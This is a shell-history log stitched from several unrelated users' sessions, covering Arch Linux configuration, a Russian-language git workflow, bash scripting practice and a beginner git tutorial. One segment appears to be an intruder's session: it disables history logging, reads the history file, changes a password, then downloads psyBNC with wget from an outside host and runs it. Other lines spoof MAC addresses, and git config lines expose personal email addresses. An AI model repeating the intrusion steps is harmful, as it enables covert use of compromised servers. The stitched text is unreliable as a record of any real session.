-Qe +pacman -Qe > packmanPackages +git add packmanPackages +git commit -m "Added installed packages" +git push +ls -la +git add ValidatePass/ +ls +;s +ls +ls /etc/ +cat /etc/X11/x +cat /etc/X11/ +ls /etc/X11/ +cat /etc/X11/xorg.conf.backup +git commit -m "Another one" +git push +reboot +ls /dev | grep sd +history | grep dd +history | grep "^sudo dd" +history | grep "sudo dd" +sudo dd if=Downloads/gparted-live-1.0.0-3-i686.iso of=dev/sdb1 +sudo dd if=Downloads/gparted-live-1.0.0-3-i686.iso of=/dev/sdb1 +reboot +mount /dev/sdb1 /mnt +sudo mount /dev/sdb1 /mnt +ls /mnt +ls /mnt/boot +ls /mnt/boot/grub/ +ls /mnt/live +ls /dev | gre psd +ls /dev | grep sd +sudo mount /dev/sdb /mnt +umount /mnt +sudo umount /mnt +sudo mount /dev/sdb /mnt +sudo dd if=Downloads/gparted-live-1.0.0-3-i686.iso of=/dev/sdb +reboot +ls /dev | grep sd +fdisk +sudo fdisk /dev/sda +ls /dev +lsblk +man sfdisk +sudo sfdisk --list-free /dev/sda +lsblk +lsblk +fdisk -s +fdisk -l +sudo fdisk -l +ls /dev | grep sd +ls /dev | grep sd +ls /dev | grep sd +ls /dev | grep sd +ls /dev | grep sd +history +sudo dd if=Downloads/Win10_1809Oct_v2_English_x64.iso of=/dev/sdb +sudo dd if=Downloads/Win10_1809Oct_v2_English_x64.iso of=/dev/sdb status=progress +reboot +pgrep woe +pgrep woeusb +lsblk +ls /dev | grep sd +sudo mount /dev/sdb /mnt +ls /mnt +pacman -Ss wine +wine /mnt/setup.exe +wine64 /mnt/setup.exe +mkdir Desktop +wine64 /mnt/setup.exe +rm -r Desktop/ +git clone +makepkg -si +git clone +makepkg -si +git clonesb.git +makepkg -si +woeusb +ls /dev | grep sd +woeusb --device Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb +sudo woeusb --device Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb +umount /mnt +sudo umount /mnt +sudo woeusb --device Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb +sudo woeusb --tgt-fs NTFS --device Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb +reboot +ls /dev | grep sd +ls /dev | grep sd +woeusb +woeusb --partition Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb1 +sudo woeusb --partition Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb1 +sudo woeusb --tgt-fs FAT --partition Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb1 +sudo woeusb --partition Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb1 --tgt-fs FAT +sudo woeusb --partition Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb1 --tgt-fs FAT32 +sudo woeusb --partition Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb1 --tgt-fs NTFS +sudo woeusb --device Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb +sudo woeusb --device Downloads/Win10_1809Oct_v2_English_x64.iso /dev/sdb --tgt-fs NTFS +reboot +shutdown 0 +lsblk +sudo pacman -Syu +reboot +free +free -h +du +man du +lsblk +man df +df -h +df -h | grep "/$" +df -h | grep "/dev/sd" +lsblk +shutdown 0 +modprobe fuse +cat /etc/modules-load.d/ +ls /etc/modules-load.d/ +sudo modprobe fuse +usbmuxd -f -v +ls /dev +ls /dev > noi +ls /dev > i +diff noi i +man diff +cat noi | wc -l +cat i | wc -l +rm noi i +pacman -Qe +pacman -Qe | grep ifuse +pacman -Qe | grep libimobile +sudo pacman -S libimobiledevice +pacman -Qs idevice +modprobe fuse +usbmuxd -f -v +man usbmuxd +idevice_id -l +ideviceinfo +ideviceinstaller -l +man ifuse +ls +cat Running +cat Starting +rm Running Starting +ls +rm Running +cat Building +rm Building +ls +rm libinput-gestures.conf +ls +mkdir iPhoneDir +ifuse iPhoneDir/ +ls iPhoneDir/ +ls +ls +ls +ls +ls +ls -l +ls -lh +ls 106APPLE/ +ls -lh +ls +ls +ls | wc -l +rm * +rm -f * +ls | wc -l + +ls | wc -l +ls +ls 112APPLE/ | wc -l +ls | wc -L +ls | wc -l +rm * +rm -f * +timedatectl set-ntp true +shutdown 0 +man ideviceinstall +man ideviceinstaller +ls +ls media/ +rm -r media/ +ls +ls +ls +ls +ls -lh +man ls +cp ~/iPhoneDir/DCIM/111APPLE/ . +ls +cp -r ~/iPhoneDir/DCIM/111APPLE/ . +cp -r ~/iPhoneDir/DCIM/112APPLE/ . +sudo wifi-menu +sudo pacman -Syu +reboot +vim .config/polybar/ +pkill polybar +./.config/polybar/launch.sh +shutdown 0 +echo $BROWSER +vim .bash_profile +echo $BROWSER +shutdown 0 +shutdown 0 +shutdown 0 +vim /etc/default/grub +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +pacman -S bitcoin +pacman -Ss bitcoin +pacman -S bfgminer +sudo pacman -S bfgminer +bfgminer +bfgminer --help +bfgminer --help | grep fan +bfgminer --benchmark +man pacman +sudo pacman -Rsu bfgminer +vimtutor +shutdown 0 +shutdown o +shutdown 0 +vim .config/ranger/rifle.conf +vim .config/ranger/rifle.conf +sudo pacman -Syu +bluetoothctl +shutdown 0 +shutdown 0 +ls /dev | grep sd +sudo mount sdb1 /mnt +sudo mount /dev/sdb1 /mnt +free /mnt +free -h /mnt +df -h /mnt +umount /mnt +sudo umount /mnt +shutdown 0 +ls -a +ls -a | grep s +ls -a | grep "^s" +ls -a | grep "^.s" +ls +cat decBrightness.sh +cat /sys/class/backlight/intel_backlight/brightnes +cat /sys/class/backlight/intel_backlight/brightness +cal +cal 3 +cal +man cal +cal -3 -m +vim .bash_profile +vim .bashrc +source .bashrc +cal +cal -1 +cal -2 +cal -3 +cal +man cal +cal -W +man c +cal -w +cat /sys/class/backlight/intel_backlight/brightness +echo 250 > /sys/class/backlight/intel_backlight/brightness +echo 100 > /sys/class/backlight/intel_backlight/brightness +echo 250 > /sys/class/backlight/intel_backlight/brightness +echo 500 > /sys/class/backlight/intel_backlight/brightness +sudo pacman -S gvfs +sudo vim /etc/sudoers +sudo pacman -Syu +shutdown 0 +shutdown 0 +shutdown 0 +ls /var/lib/pacman/ +cp /var/lib/pacman/db.lck . +sudo cp /var/lib/pacman/db.lck . +sudo rm /var/lib/pacman/db.lck +rm db.lck +ls +git clone +ls +makepkg -si +makepkg -si +makepkg -si +plymouth --show-splash +plymouth-set-default-theme +plymouth-set-default-theme -l +sudo vim /etc/mkinitcpio.conf +vim /etc/default/grub +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +vim /etc/plymouth/plymouthd.conf +reboot +vim /etc/plymouth/plymouthd.conf +reboot +vim /etc/plymouth/plymouthd.conf +reboot +vim /etc/plymouth/plymouthd.conf +dmidecode +sudo pacman -S dmidecode +dmidecode -t bios +sudo dmidecode -t bios +vim /etc/plymouth/plymouthd.conf +reboot + cp /usr/share/plymouth/arch-logo.png /usr/share/plymouth/themes/spinner/watermark.png +sudo cp /usr/share/plymouth/arch-logo.png /usr/share/plymouth/themes/spinner/watermark.png +vim /etc/plymouth/plymouthd.conf +cat /etc/plymouth/plymouthd.conf +reboot +history +vim /etc/plymouth/plymouthd.conf +reboot +plymouthd +sudo plymouth +plymouth --show-splash +plymouth --quit +plymouthd +sudo plymouthd +vim /etc/plymouth/plymouthd.conf +vim /etc/plymouth/plymouthd.conf +cat /etc/plymouth/plymouthd.conf +reboot +vim /etc/plymouth/plymouthd.conf +reboot +sudo plymouth +sudo plymouthd +plymouth --show-splash +plymouth --quit +sudo plymouth --quit +sudo plymouth --quit +vim /etc/plymouth/plymouthd.conf +mkinitcpio -p linux +sudo mkinitcpio -p linux +reboot +history +sudo vim /etc/mkinitcpio.conf +vim /etc/default/grub +plymouth-set-default-theme -R spinner +sudo plymouth-set-default-theme -R spinner +reboot +reboot +shutdown 0 +ls +file plymouthd.defaults +vim plymouthd.defaults +ls +ls +sudo rm watermark.png +plymouth-set-default-theme -R spinner +sudo plymouth-set-default-theme -R spinner +reboot +vim /etc/plymouth/ +plymouth-set-default-theme -R solar +sudo plymouth-set-default-theme -R solar +reboot +man update-grub2 +man update-grub +mupdate-grub2 +update-grub2 +update-grub +sudo pacman -Rsu plymouth +makepkg -si +vim /etc/mkinitcpio. +vim /etc/mkinitcpio.conf +vim /etc/default/grub +mkinitcpio -p linux +sudo mkinitcpio -p linux +vim /etc/plymouth/plymouthd.conf +reboot +sudo pacman -Rsu plymouth +vim /etc/default/grub +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +vim /etc/mkinitcpio.conf +mkinitcpio -p linux +sudo mkinitcpio -p linux +reboot +shutdown 0 +vim .config/i3/config +git clone +makepkg -si +minecraft-launcher +sudo pacman -Syu +weather-report +weather-report Bucharest +weather-report Romania +weather-report Bucuresti +weather-report Bucuresti Otopeni +weather-report 'Bucuresti Otopeni' +shutdown 0 +timedatectl set-ntp true +pkill polybar +./.config/polybar/launch.sh +shutdown 0 +shutdown 0 +man cp +man pv +pv --help +ls /mnt +ls /mnt +sudo mnt /dev/sdb1 /mnt +sudo mount /dev/sdb1 /mnt +ls /mnt +sudo umount /mnt +sudo mount /dev/sdb1 /mnt +ls /mnt +sudo umount /mnt +sudo mount /dev/sdb1 /mnt +ls +rm -r * +rm -rf * +ls +cp -r ~/Diverse/SchoolRelated.backup/SchoolRelated.backup/ccop/ccop_brinzea/Cercetari\ Operationale/tutoriale\ cccop/* . +ls /mnt +sudo umount /mnt +sudo umount /mnt +ls /mnt +shutdown 0 +ip link +netctl list +autonetctl list +man netctl +netctl list +man netctl +netctl-auto list +sudo netctl-auto list +sudo pacman -Syu +sudo pacman -S macchanger +ip link +macchanger -r wlp3s0 +sudo macchanger -r wlp3s0 +sudo macchanger -r enp4s0 +netctl-auto disable +netctl-auto list +sudo netctl-auto list +man netctl +netctl stop all +netctl-auto stop all +systemctl stop netctl-auto@all +systemctl stop netctl-auto@all +systemctl stop netctl-auto@all +netctl-auto list +sudo netctl-auto list +man netctl +man netctl-atuo +man netctl-auto +ip link +netctl-auto stop wlp3s0 +sudo netctl-auto stop wlp3s0 +systemctl stop netctl-auto@wlp3s0 +macchanger -r wlp3s0 +sudo macchanger -r wlp3s0 +wifi-menu +sudo wifi-menu +sudo wifi-menu +ls +ls +cat decBrightness.sh +sudo echo 75 > /sys/class/backlight/intel_backlight/brightness +sudo echo 100 > /sys/class/backlight/intel_backlight/brightness +sudo echo 250 > /sys/class/backlight/intel_backlight/brightness +cat /sys/class/backlight/intel_backlight/brightness +git clone +makepkg -si +systemctl stop netctl-auto@wlp3s0 +systemctl stop netctl-auto@wlp3s0 +netctl-auto list +netctl list +netctl stop all +netctl list +netctl stop-all +macchanger -r wlp3s0 +sudo macchanger -r wlp3s0 +sudo wifi-menu +ip link +macchanger -r enp4s0 +sudo macchanger -r enp4s0 +shutdown 0 +vim .config/i3/config +exit +startx +startx +exit +vim .config/i3/config +./.config/polybar/launch.sh +vim .config/i3/config +man shutdown +vim .config/i3/config +j +vim .config/i3/config +vim .config/i3/config +vim .config/i3/config +shutdown 0 +shutdown 0 +pgrep steam +pkill steam +pgrep steam +sudo pacman sxiv +sudo pacman -S sxiv +vim .config/ranger/rifle.conf +man man +shutdown 9 +shutdown 0 +man convert +man sxiv +man sxiv +shutdown 0 +libinput start +libinput -help +man libinput +ls +cat archNotes.self +cat usefulCmd +vim /etc/libinput-gestures.conf +systemctl start libinput.service +libinput-gestures +libinput-gestures --help +libinput-gestures -h +man libinput-gestures +man libinput +libinput-gestures start +vim archNotes.self +vim usefulCmd +rebotot +reboot +ls +tldr unzip +unzip ccop_rezolvate_de_mine.zip -d ../Diverse/CCOP_Rez_Liviu +man sxiv +shutdown 0 +shutdown 0 +pkill polybar +./.config/polybar/launch.sh +sudo pacman -Syu + iana-etc-20190823-1-any 369.2 KiB 393K/s 00:01 [######################################################] 100% +sudo pacman -S dosbox +dosbox +ls +mkdir dbp +vim bianca.asm +find / vim +tldr find +find / -type d -name vim +vim /usr/share/vim/vim81/ftplugin +ls +cat perl.vim +ls +vim asm.vim +ls +rm asm.vim +sudo rm asm.vim +vim .vimrc +shutdown 0 +shutdown 0 +sudo timedatectl set-ntp true +pkill polybar +./.config/polybar/launch.sh +sudo pacman -Syu +shutdown 0 +echo Hello Spoiala +pkill polybar +./.config/polybar/launch.sh +alsapulseaudio +pulseaudio +pulseaudio +sudo pacman -Syu +echo Salut +shutdown 0 +ls +stat archNotes.self +stat archNotes.self | tail +stat archNotes.self | tail -1 +stat archNotes.self | tail -1 | cut -f2, +stat archNotes.self | tail -1 | cut -f2 +stat archNotes.self | tail -1 | cut -f2 -d=' ' +stat archNotes.self | tail -1 | cut -f2 -d' ' +stat archNotes.self | tail -1 | cut -f1 -d' ' +stat archNotes.self | tail -1 | cut -f3 -d' ' +reboot +man sed +tldr unzip +unzip HeroiDorinC112A.zip -d examSO +ls +ls +vim ex1.sh +vim ex2.sh +;s; +ls +cp HeroiDorinC112A/* . +ls +rm -r HeroiDorinC112A/ +ls +mv Downloads/examSO/ Diverse/ +vim test +cat test +sed -p test +man sed +shutdown 0 +shutdown 0 +vim .config/i3/config +ls +ls | wc -l +man sxiv +pacman -Syu +sudo pacman -Syu +ls +ls +tldr unzip +unzip WhatsApp\ Chat\ -\ Mihai\ P.zip -d ../WhappChats +ls +mkdir MihaiP +mv 0* MihaiP/ +ls +mv _chat.txt MihaiP/ +ls +ls +rm WhatsApp\ Chat\ -\ Mihai\ P.zip +unzip WhatsApp\ Chat\ -\ Operațiunea\ Plutonul2.zip -d ../WhappChats/Operatiunea\ Plutonul2 +ls +rm WhatsApp\ Chat\ -\ Operațiunea\ Plutonul2.zip +unzip WhatsApp\ Chat\ -\ Da\ Brudarhood.zip -d ../WhappChats/Da\ Brudahood +shutdown 0 +./.config/polybar/launch.sh +sudo wifi-menu +sudo pacman -S maim +man slop +slop +ls +man slop +sudo pacman -S scrot +man scrot +scrot +ls +sudo pacman -Rsu maim +sudo pacman -R polybar +ls +makepkg -si +pkill wine +scrot -s +scrot -s +ls +rm 2019-09-19-* +scrot -s +man scrot +sudo pacman -Syu polybar +polybar +ls +rm -r polybar-git/ +rm -fr polybar-git/ +git clone +makepkg -si +./.config/polybar/launch.sh +reboot +reboot +git clone +makepkg -si +pgrep teamviewer +teamviewer +pkill teamviewer +pgrep team +pgrep viewre +pgrep viewer +reboot +ps -efl +ps +teamviewer +reboot +teamviewer +teamviewer help +git clone +makepkg -soi +makepkg -si +reboot +teamviewer +reboot +ls +makepkg -si +teamviewer -daemon start +sudo pacman -Rsu teamviwer +sudo pacman -Rsu teamviewer +sudo pacman -Rsu teamviewer-beta +teamviewer-beta +sudo pacman -Rsu teamviewer-beta +ls +pgrep teamviewer +pkill teamviewer +sudo pkill teamviewer +sudo pacman -S lib32-freetype2 2.8-2 +sudo pacman -S lib32-freetype2 +sudo pacman -Rsu lib32-freetype2 +sudo pacman -Rsu teamviewer +rm -r teamviewer teamviewer-beta/ +rm -rf teamviewer teamviewer-beta/ +ls +shutdown 0 +shutdown 0 +echo Hello Gabi +sudo pacmans -Q +pacman -Q +pacman -Q +pacman -Q +sudo wifi-menu +sudo wifi-menu +shutdown 0 +shutdown 0 +scrot +echo Haha, scrot +scrot +wifi-menu +sudo wifi-menu +sudo wifi-menu +shutdown 0 +cal +shutdown 0 +shutdown 0 +sudo wifi-menu +mkdir Test1 +sudo pacman -S gdb +vim .config/polybar/config +sh /tmp/Microsoft-MIEngine-Cmd-2cj8or2p.6aa +env sh /tmp/Microsoft-MIEngine-Cmd-hozv76wh.8vz +shutdown 0 +ls +git clonessql-server.git +ls +makepkg -si +cal +mssql-server +ls +./opt/mssql/bin/sqlservr +ls /opt/mssql/bin/sqlservr +ls +sqlsharp +sqlservr +ls +cat sqlservr +file sqlservr +sqlservr +./sqlservr +sudo ./sqlservr +sudo ./sqlservr --accept-eula +wine +shutdown 0 +vim archNotes.self +ls +vim archNotes.self +vim .config/polybar/config +df /dev/sdb +df /dev/sdb* +df -h /dev/sdb* +df -h /dev/sdb* +ls /dev/sdb* +df -h /dev/sdb* +sudo mount /dev/sdb1 /mnt +ls +df -h /mnt +umount /mnt +sudo umount /mnt +sudo mount /dev/sdb1 /mnt +df -h /mnt +ls /mnt +file /mnt/System\ Volume\ Information/ +ls +ls +rm *.MOV +y +rm -f *.mp4 +ls +rm *.jpeg +ls +df -h +df -h /mnt +sudo umount /mnt +git clonestable.git +ls +makepkg -si +makepkg -si +rm -r monodevelop-stable/ +ls +ls -a +rm -f monodevelop-stable/ +rm -rf monodevelop-stable/ +git clone +ls +makepkg -si +git clonesharp.git +ls +makepkg -si +ls +rm -rf gnome-sharp/ +rm -rf monodevelop-git/ +shutdown 0 +shutdown 0 +ls /dev +ls /dev +lsblk +/usr/bin/lsusb -v +/usr/bin/lsusb -v | grep Reader +/usr/bin/lsusb -v | grep reader +pacman -S ssh +sudo pacman -S ssh +man ssh +sudo pacman -S putty +sudo pacman -Syu +sudo pacman -S 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+.config/polybar/launch.sh +.config/polybar/launch.sh +wal -i Downloads/wallpapers/dragon.jpg +vim .config/polybar/config +wal -i Diverse/Wallpapers/e15.jpg +wal -i Diverse/Wallpapers/e16.jpg +Matlab/bin/matlab +sudo pacman -S linuxfb +sudo pacman -S minimal +shutdown 0 +vim .config/polybar/config +vim .cache/wal/colors.Xresources +shutdown 0 +.config/polybar/launch.sh +ranger +vim .cache/wal/colors.Xresources +.config/polybar/launch.sh +wal -i Downloads/wallpapers/koi.jpg +vim .cache/wal/colors.Xresources +sudo pacman -S lib32-fontconfig lib32-freetype2 +pacman -S fontconfig freetype2 +sudo pacman -S fontconfig freetype2 +vim .config/i3/config +Matlab/bin/matlab +sudo pacman -S libxcb +Matlab/bin/matlab +ls +sudo wifi-menu +sudo mount /dev/sdb1 /mnt +ls +vim Matlab_2017a_Linux_x86-64/INSTALL +ls +ls | grep libstd +vim .config/polybar/config +vim .config/termite/ +git clones-complete.git +ls +makepkg -si +mkdir fontconfig_self +vim PKGBUILD +vim fontconfig.hook +vim fontconfig.install +makepkg -si +rm -r fontconfig_self/ +ls +ls | grep ^f +man tar +tldr tar +tar xf fontconfig-2.12.6+5+g665584a-1-x86_64.pkg.tar.xz -C ~/Matlab/bin/glnxa64/ +ls +mkdir test +mv fontconfig-2.12.6+5+g665584a-1-x86_64.pkg.tar.xz test/ +ls +tar xz fontconfig-2.12.6+5+g665584a-1-x86_64.pkg.tar.xz +tar fxz fontconfig-2.12.6+5+g665584a-1-x86_64.pkg.tar.xz +tldr tar +tar xf fontconfig-2.12.6+5+g665584a-1-x86_64.pkg.tar.xz +ls +ls usr/ + ~/Matlab/bin/matlab +mv test/fontconfig-2.12.6+5+g665584a-1-x86_64.pkg.tar.xz . +rm -r test/ +rm -fr test/ +ls +ls +ls +vim matlab_crash_dump. +vim matlab_crash_dump.5559-1 +sudo pacman -Ss qt +sudo pacman -Ss qt5 +sudo pacman -Ss qt5-base +man pacman +pacman -Ql qt5-base +pacman -Ql qt5-base | less +pacman -Qk qt5 +pacman -Qk qt5-base +echo $QT_PLUGIN_ATH +echo $QT_PLUGIN_PATH +export QT_PLUGIN_PATH=/usr/lib/qt/plugins/ +echo $QT_PLUGIN_PATH +Matlab/bin/matlab +ls /usr/share/lib | grep xcb +ls /usr/lib/qt/plugins | grep xcb +Matlab/bin/matlab +env +env | grep QT +Matlab/bin/matlab & +env +export QT_QPA_PLATFORM="xcb" +env | grep QT +vim .bashrc +pacman -Ss linuxdeployqt +Matlab/bin/matlab +man ldd +vim .bashrc +env +env +Matlab/bin/matlab +ldd /usr/lib/qt/plugins/platforms/libqxcb.so +sudo pacman -S libxcb +Matlab/bin/matlab +ls +rm matlab_crash_dump.* +ls +vim .config/i3/config +vim .cache/wal/colors.Xresources +vim .cache/wal/colors +vim .config/i3/config +wal -i Diverse/Wallpapers/e20.jpg +wal -i Downloads/wallpapers/halloween.jpg +wal -i Downloads/wallpapers/dragon.jpg +shutdown 0 +vim .config/i3/config +ls -la +ls +ls +wal -i Diverse/Wallpapers/e22.jpg +shutdown 0 +ranger +ls +tldr zip +zip Essentials\ of\ Russian/ +zip -r Essentials\ of\ Russian/ +zip -r essentialsOfRussian.zip Essentials\ of\ Russian/ +ls +ranger +reboot +tlp +tlp start +sudo tlp start +ps -elf +pstree +mkdir lab3 +vim fork.c +ps -ef +vim forkMe.c +gcc forkMe.c +ls +./a.out +rm a.out +gcc forkMe.c -o fork +ls +./fork +./fork +gcc forkMe.c -o fork +./fork +gcc forkMe.c -o fork +./fork +gcc forkMe.c -o fork +./fork +gcc forkMe.c -o fork +./fork +gcc forkMe.c -o fork +./fork +gcc forkMe.c -o fork +./fork +route -n +shutdown 0 +ps -ef +ps -ef +route -n +ip add +apropos zombie +vim .config/ranger/ +rm * +ls +rm -f * +rm -rf * +ls +ls +git clone +ls +makepkg -si +etcher 2019_10_19_102334_Sectie_PV_Tragere_Sorti_B.PDF +arp +man arp +arp -e +mv Downloads/packet_tracer_7.1.1_for_linux_64_bit.tar.gz gitRepos/packettracer/ +makepkg -si +ls +rm packet_tracer_7.1.1_for_linux_64_bit.tar.gz +mv ~/Downloads/packet_tracer_7.2.1_for_linux_64_bit.tar.gz . +ls +makepkg -si +ls +ls -la +vim pt.install +vim packettracer.sh +ls +ls +vim PKGBUILD +mkdir packettracer7.2.1 +cp packettracer/packet_tracer_7.2.1_for_linux_64_bit.tar.gz packettracer7.2.1/ +ls +pacman -U packet_tracer_7.2.1_for_linux_64_bit.tar.gz +sudp pacman -U packet_tracer_7.2.1_for_linux_64_bit.tar.gz +sudo pacman -U packet_tracer_7.2.1_for_linux_64_bit.tar.gz +ls +tldr tar +tar xf packet_tracer_7.2.1_for_linux_64_bit.tar.gz +ls +make +make install +vim install +./install +./install +reboot +packettracer +shutdown 0 +bc -l +man bc +bc -l +man bx +man bc +bc +man bc +bc +man bc +python +shutdown 0 +reboot +sudo timedatectl set-ntp true +.config/polybar/launch.sh +python +python +ranger +sudo find / -name '0xphi3ajdlo.jss' +pacman -Ss pycharm +sudo pacman -S pycharm +sudo pacman -S pycharm-community-edition +pycharm +sudo pacman -Rsu pycharm-community-edition +shutdown 0 +cat rangerScript.sh +ls -la +git add .config/ranger/ +git add .config/ofi +git add .config/rofi +git add .config/wal/ +git add .cache/wal/ +git add .vim +du -h Downloads/ +git add Downloads/wallpapers/ +git add WhappChats/ +git init +git config --global user.name "nikolai" +git config --global user.email kvasov1992@inbox.ru +git config --list +git status +git add .left.menu.php +git add +git add +git add otzyvy-o-magazine.php +git status +clear +git commit -a -m"Первый коммит на ветке master. Добавлены новые файлы" +git status +git checkout -B "Working" +git branch +git checkout -B "Service" +git branch +git log +git commit -a -m"Первый коммит на ветке Service. Добавлены новые файлы" +git branch Working +git checkout Working +git log +git branch +git status +git add bitrix\components\custom\.description.php +git add \bitrix\components\custom\.description.php +git help add +git add bitrix-test.ru/bitrix/components/custom/.description.php +git status +git status --untracked-files=all +git status +git add .description.php +git status +git add lang +git status +git commit -a -m"Первый коммит на ветке Working" +git status +git status +git add lang +git add .parameters.php +git status +git commit -a -m"Второй коммит ветки Working" +git add log +git log +git status +git add component.php +git add +git add newstools.php +git status +git log +git commit -m -a "Третий коммит ветки Working" +git commit -a -m "Третий коммит ветки Working" +git commit status +git add templates +git status +git log +git commit -a -m "Четвёртый коммит ветки Working" +git log +git branch +git branch Service +git branch Service +clear +git checkout Service +git status +git +git c +git branch +git status +git status +git add otzyvy-o-magazine.php +git status +git log +git commit -a -m "Пятый, итоговый коммит ветки Working" +git rebase Service +git branch +git log --pretty=format:"%h - %an, %ar : %s + + + + + + +git log --pretty=format:"%h - %an, %ar : %s +git log --pretty=format:"%h - %an, %ar : %s + + + + + + +git log --pretty=format:"%h - %an, %ar : %s" + + + + + + + +git branch +clear +git status +git log --pretty=format:"%h - %an, %ar : %s +git log --pretty=format:"%h - %an, %ar : %s + + + +git status +git log +git branch -v +git branch Service +git checkout Service +git branch -D Service +git checkout Working +git branch -D Service +git branch -v +git status +git status +git add otzyvy-o-magazine.php +git log +git commit -a -m "Шестой коммит ветки Working. Компоненту требовалась настройка" +git log +unset histfile +W +w +ls -a +cat .bash_history +w +passwd +w +ls -a +ps x +ls +tar zxvf locale.tar.gz +wget bnc-irc.trei.ro/linux/psybnc.tar.gz +tar zxvf psybnc.tar.gz +./psybnc +chmod +x * +./posybnc +help +bash string3.sh +nano string3.sh +bash string3.sh +nano string3.sh +bash string3.sh +nano string3.sh +bash string3.sh +nano string3.sh +bash string3.sh +nano string3.sh +bash string3.sh +echo date '+%a' +date '+%a' +if [[ (date '+%a') =~ "Fri" ]] +if [[ (date '+%a') =~ "Fri" ]] then echo "friday" fi +date '+%a' +b = date '+%a' +let b = date '+%a' +let b=date '+%a' +let b=date +echo b +echo $b +let b=date '+%a' +date '+%a' +if [[ date '+%a' = 'Mon' ]] +if [[ date '+%a' = 'Mon' ]] then echo "its monday" fi +if [$(date '+%A') = "SUNDAY" then echo "sunday" else echo "its not" fi; ]; s; ]; dfffdfgvdfvgdf; ) +if [$(date '+%A') = "SUNDAY"] then echo "sunday" else echo "its not" fi; ) +ls +nano sunday.sh +bash sunday.sh +nano sunday.sh +bash sunday.sh +nano sunday.sh +bash sunday.sh +nano sunday.sh +bash sunday.sh +nano sunday.sh +bash sunday.sh +plagues=(blood frogs lice flies sickness boils hail locusts darkness death) +echo ${plagues[0]} +echo ${plagues[*]} +echo ${plagues[*]:5:3} +echo ${#plagues[*]} +plagues+=(grumpy sleepy) +echo ${plagues[*]} +nano array.sh +bash array.sh +nano array.sh +bash array.sh +nano array.sh +bash array.sh +nano array.sh +bash array.sh +nano array.sh +bash array.sh +nano array.sh +bash array.sh +nano array.sh +bash array.sh +nano array.sh +bash array.sh +echo {a..e +echo {a..e} +echo {a..E} +echo {a..A} +echo {A..d} +echo {5..3} +start=4 +end=9 +echo {$start..$end} +eval echo {$start..$end} +touch text{1...100} +ls +touch eval text{1...100} +ls +touch eval text{1..100} +ls +rm text1 +ls +ls text1* +rm eval text(2..100} +rm eval text{2..100} +ls +nano loop.sh +bash loop.sh +nano loop.sh +bash loop.sh +ls +nano whileloop.sh +bash whileloop.sh +nano whileloop.sh +bash whileloop.sh +nano whileloop.sh +bash whileloop.sh +yes +man yes +man no +no +nano function.sh +bash function.sh +nano function.sh +bash function.sh +nano function.sh +bash function.sh +nano function.sh +bash hello.sh +nano function.sh +rn function.sh hello.sh +mv function.sh hello.sh +ls +bash hello.sh +nano hello.sh +bash hello.sh +nano hello.sh +bash hello.sh +nano test.sh +bash test.sh +nano test.sh +source test.sh +test +hello +source hello.sh +hello +source hello.sh +hello +nano hello.sh +bash hello.sh +nano hello.sh +nano plier.sh +bash plier.sh +source plier.sh +plier 5 10 20 +nano plier.sh +plier 5 10 20 +bash plier.sh +source plier.sh +plier 5 10 20 +nano plier.sh +plier 5 10 20 +bash plier.sh +plier 5 10 20 +source plier.sh +plier 5 10 20 +nano isiteven.sh +bash isiteven.sh +source isiteven.sh +isiteven 2 +nano isiteven.sh +bash isiteven.sh +source isiteven.sh +isiteven 2 +if ((2 % 2 =0 )) then echo "even" else echo "odd" fi +if $ then echo "even" else echo "odd" fi +if [ $((2%2)) -eq 0 ] ; then echo "even"; else echo "odd"; fi +nano isiteven.sh +bash isiteven.sh +nano isiteven.sh +bash isiteven.sh +nano isiteven.sh +bash isiteven.sh +source isiteven.sh +isiteven 5 +isiteven 9 +isiteven 4 +nano isiteven.sh +bash isiteven.sh +source isiteven.sh +isiteven 4 +isiteven 5 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nano nevens.sh +bash nevens.sh +source nevens.sh +nevens 1 2 3 4 +nevens 1 2 3 4 6 8 10 +nano howodd.sh +nano nevens.sh +nano howodd.sh +bash howodd.sh +source howodd.sh +howodd 1 2 3 4 5 +nano howodd.sh +bash howodd.sh +source howodd.sh +howodd 1 2 3 4 5 +nano howodd.sh +nano nevens.sh +nano howodd.sh +bash howodd.sh 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7 ]] || echo hel && echo her || [[ 7 -gt 4 ]] +lab=(jeff roger brian) +lab[3]=sean +lab=("${lab[*]}" "${lab[*]}") +echo ${#lab[*]} +echo ${lab[*]} +echo ${#lab[*]} +lab=(jeff roger brian) +lab[3]=sean +echo ${#lab[*]} +echo ${lab[*]} +lab=("${lab[*]}" "${lab[*]}") +echo ${lab[*]} +echo ${#lab[*]} +seq=$(eval echo {$1..$2}) +ls +nano quiz.sh +bash quiz.sh 1 9 2 +bash quiz.sh 1 6 3 +bash quiz.sh 1 9 3 +bash quiz.sh 1 6 2 +nano quiz.sh +bash quiz.sh +nano quiz.sh +bash quiz.sh 1 6 2 +bash quiz.sh 1 9 3 +git --version +git config --global user.name "vidhya1107" +git config --global user.email vidhyalakshmi1107@gmail.com +mkdir my-first-repo +git init +echo "welcome to my first Repo" > readme.txt +git status +git add readme.txt +git status +git rm --cached readme.txt +git status +git add readme.txt +git commit -m "added readme.txt" +git status +touch file1.txt +touch file2.txt +ls +echo "learning gits is going well so far." >> readme.txt +git status +git add -A +git status +git commit -m "added 2 files" +git reset --soft HEAD~ +git status +mv file2.txt file3.txt +git status +git commit -m "added 